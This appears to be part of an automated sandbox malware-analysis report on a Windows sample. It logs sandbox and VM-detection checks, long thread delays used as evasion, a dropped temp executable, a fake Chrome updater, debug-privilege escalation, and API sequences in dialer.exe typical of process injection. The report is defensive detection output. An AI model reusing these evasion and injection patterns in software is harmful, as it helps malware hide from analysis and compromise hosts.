Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		5_2_00007FF67E6C10C0
Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		26_2_00007FF6101910C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5488	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4335	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6313	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3337	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9279	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 718	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9924	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9867	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2213
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7323
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2820

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp

Jump to dropped file

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_9-14069
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_11-21182
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_10-13987
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_8-21177

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-432

Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.9 %
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.2 %
Source: C:\Windows\System32\conhost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep count: 5488 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep count: 4335 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 8112	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 6313 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep count: 3337 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2248	Thread sleep count: 9279 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2248	Thread sleep time: -9279000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2248	Thread sleep count: 718 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2248	Thread sleep time: -718000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7412	Thread sleep count: 9924 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7412	Thread sleep time: -9924000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7472	Thread sleep count: 237 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7472	Thread sleep time: -237000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6768	Thread sleep count: 9867 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6768	Thread sleep time: -9867000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2940	Thread sleep count: 254 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2940	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6692	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6692	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 832	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 832	Thread sleep time: -101000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6468	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6468	Thread sleep time: -114000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 756	Thread sleep count: 197 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 756	Thread sleep time: -197000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7268	Thread sleep count: 234 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7268	Thread sleep time: -234000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484	Thread sleep count: 2213 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484	Thread sleep count: 7323 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7752	Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 7752	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8032	Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 8032	Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 2060	Thread sleep count: 1811 > 30
Source: C:\Windows\System32\dialer.exe TID: 2060	Thread sleep time: -181100s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552	Thread sleep count: 6780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep count: 2820 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1724	Thread sleep count: 241 > 30
Source: C:\Windows\System32\svchost.exe TID: 1724	Thread sleep time: -241000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7852	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 7852	Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7836	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 7836	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7320	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7320	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2896	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3080	Thread sleep count: 205 > 30
Source: C:\Windows\System32\svchost.exe TID: 3080	Thread sleep time: -205000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7408	Thread sleep count: 210 > 30
Source: C:\Windows\System32\svchost.exe TID: 7408	Thread sleep time: -210000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 332	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 332	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 572	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 572	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2052	Thread sleep count: 222 > 30
Source: C:\Windows\System32\svchost.exe TID: 2052	Thread sleep time: -222000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1212	Thread sleep count: 244 > 30
Source: C:\Windows\System32\svchost.exe TID: 1212	Thread sleep time: -244000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1392	Thread sleep count: 65 > 30
Source: C:\Windows\System32\svchost.exe TID: 1392	Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5664	Thread sleep count: 34 > 30
Source: C:\Windows\System32\svchost.exe TID: 5664	Thread sleep time: -34000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3412	Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 3412	Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3568	Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 3568	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5508	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 5508	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5652	Thread sleep count: 244 > 30
Source: C:\Windows\System32\svchost.exe TID: 5652	Thread sleep time: -244000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1280	Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 1280	Thread sleep time: -57000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 1764	Thread sleep count: 53 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 1764	Thread sleep time: -53000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2328	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69BE3C FindFirstFileExW,	8_2_000002EA8A69BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EBE3C FindFirstFileExW,	9_2_000001CB338EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CBE3C FindFirstFileExW,	10_2_0000026E027CBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1BE3C FindFirstFileExW,	11_2_000001C6CEF1BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBBE3C FindFirstFileExW,	12_2_0000025304FBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116BE3C FindFirstFileExW,	13_2_0000016C2116BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CBE3C FindFirstFileExW,	13_2_0000016C211CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814BE3C FindFirstFileExW,	14_2_0000026F4814BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234BE3C FindFirstFileExW,	15_2_0000029B9234BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923ABE3C FindFirstFileExW,	15_2_0000029B923ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AABE3C FindFirstFileExW,	16_2_0000020422AABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BBE3C FindFirstFileExW,	17_2_00000206287BBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139BE3C FindFirstFileExW,	20_2_000002847139BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254BE3C FindFirstFileExW,	21_2_000001829254BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6BE3C FindFirstFileExW,	24_2_000001BB3DA6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4BE3C FindFirstFileExW,	25_2_0000029ABCF4BE3C
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDBE3C FindFirstFileExW,	28_2_0000025E81DDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8BE3C FindFirstFileExW,	29_2_000001CD9AD8BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39BE3C FindFirstFileExW,	31_2_000002AF8C39BE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\svchost.exe	Thread delayed: delay time: 30000

Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdownLMEM h+
Source: svchost.exe, 00000015.00000003.1452190530.0000018292858000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: orvmciTTBL
Source: svchost.exe, 00000015.00000002.2647250497.0000018291E43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000010.00000000.1407038647.0000020421C2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000000E.00000000.1401818846.0000026F47400000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: dwm.exe, 0000000B.00000000.1365136495.000001C6CAD12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: lsass.exe, 00000009.00000000.1347907682.000001CB32A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2635390523.000001CB32A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1352273729.0000026E02813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2633516653.0000026E02813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2628456366.0000016C20A27000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1400209523.0000016C20A27000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2618112358.0000026F4742A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1401896653.0000026F4742A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2636780084.0000020421C41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1407107755.0000020421C41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dwm.exe, 0000000B.00000000.1365136495.000001C6CAD12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node			graph_5-479
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\h2qWqtD73F.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000002EA8A69B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_000002EA8A69B50C

Source: C:\Windows\System32\dialer.exe

5_2_00007FF67E6C2328

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000002EA8A69B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A697E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000002EA8A697E70
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000001CB338E7E70
